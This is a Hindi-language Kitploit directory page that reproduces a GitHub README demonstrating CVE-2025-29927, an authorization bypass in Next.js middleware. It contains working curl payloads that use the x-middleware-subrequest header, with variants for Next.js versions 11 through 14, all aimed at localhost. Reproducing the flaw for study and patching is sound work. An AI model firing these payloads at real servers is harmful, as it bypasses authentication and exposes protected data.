Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2995 — Next.js मिडलवेयर में CVE-2025-29927 प्राधिकरण उपमार्ग का पुनरुत्पादन, कई संस्करणों के लिए curl-आधारित शोषण पेलोड के साथ। | Kitploit
उपकरण/GitHubGitHub/huynguyen12536/cve-2025-2995
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhuynguyen12536/cve-2025-2995

CVE-2025-2995

Next.js मिडलवेयर में CVE-2025-29927 प्राधिकरण उपमार्ग का पुनरुत्पादन, कई संस्करणों के लिए curl-आधारित शोषण पेलोड के साथ।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927 प्राधिकरण बाइपास पुनरुत्पादन

यह रिपॉजिटरी next पैकेज में CVE-2025-29927 भेद्यता का पुनरुत्पादन है।

पुनरुत्पादन कैसे करें

  1. नीचे दिए गए चरणों का पालन करके Next.js एप्लिकेशन को क्लोन करें और चलाएं
  2. परीक्षण करें कि प्राधिकरण /api/hello एंडपॉइंट तक पहुंच से इनकार करता है
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. परीक्षण करें कि टोकन प्रदान करने पर प्राधिकरण काम करता है
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. अब इसे विशेष x-middleware-subrequest हैडर में middleware को 5 बार नेस्ट करके भी बाइपास किया जा सकता है:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

पुराने Next.js संस्करणों के लिए CVE-2025-29927 शोषण

Next.js 12 और 13 संस्करणों में मिडलवेयर फ़ाइल (_middleware.js) के लिए एक अलग नामकरण परंपरा थी, जिसे Next.js 14 में बदलकर middleware.js कर दिया गया। इस भेद्यता का पुराने संस्करणों में _middleware.js फ़ाइल का उपयोग करके शोषण किया जा सकता है।

उदाहरण के लिए, Next.js संस्करण और आपकी रूटिंग परंपरा के अनुसार निम्नलिखित पेलोड लागू होंगे:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (Next.js संस्करण 12.2 के लिए जिसमें middleware.js फ़ाइल एप्लिकेशन के रूट में है, pages निर्देशिका के अंदर नहीं)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (Next.js संस्करण 11 से 12.2 तक के लिए)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

आरंभ करना

सबसे पहले, डेवलपमेंट सर्वर चलाएं:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

परिणाम देखने के लिए अपने ब्राउज़र में http://localhost:3000 खोलें।

आप app/page.js को संशोधित करके पेज को संपादित करना शुरू कर सकते हैं। फ़ाइल संपादित करते ही पेज स्वतः अपडेट हो जाता है।

यह प्रोजेक्ट Vercel के लिए एक नया फ़ॉन्ट परिवार Geist को स्वचालित रूप से अनुकूलित और लोड करने के लिए next/font का उपयोग करता है।

और जानें

Next.js के बारे में अधिक जानने के लिए, निम्नलिखित संसाधनों पर एक नज़र डालें:

  • Next.js Documentation - Next.js सुविधाओं और API के बारे में जानें।
  • Learn Next.js - एक इंटरैक्टिव Next.js ट्यूटोरियल।

आप Next.js GitHub रिपॉजिटरी देख सकते हैं - आपकी प्रतिक्रिया और योगदान का स्वागत है!

Vercel पर डिप्लॉय करें

अपने Next.js ऐप को डिप्लॉय करने का सबसे आसान तरीका Next.js के निर्माताओं से Vercel Platform का उपयोग करना है।

अधिक विवरण के लिए हमारा Next.js डिप्लॉयमेंट दस्तावेज़ीकरण देखें।

टूल डाउनलोड करें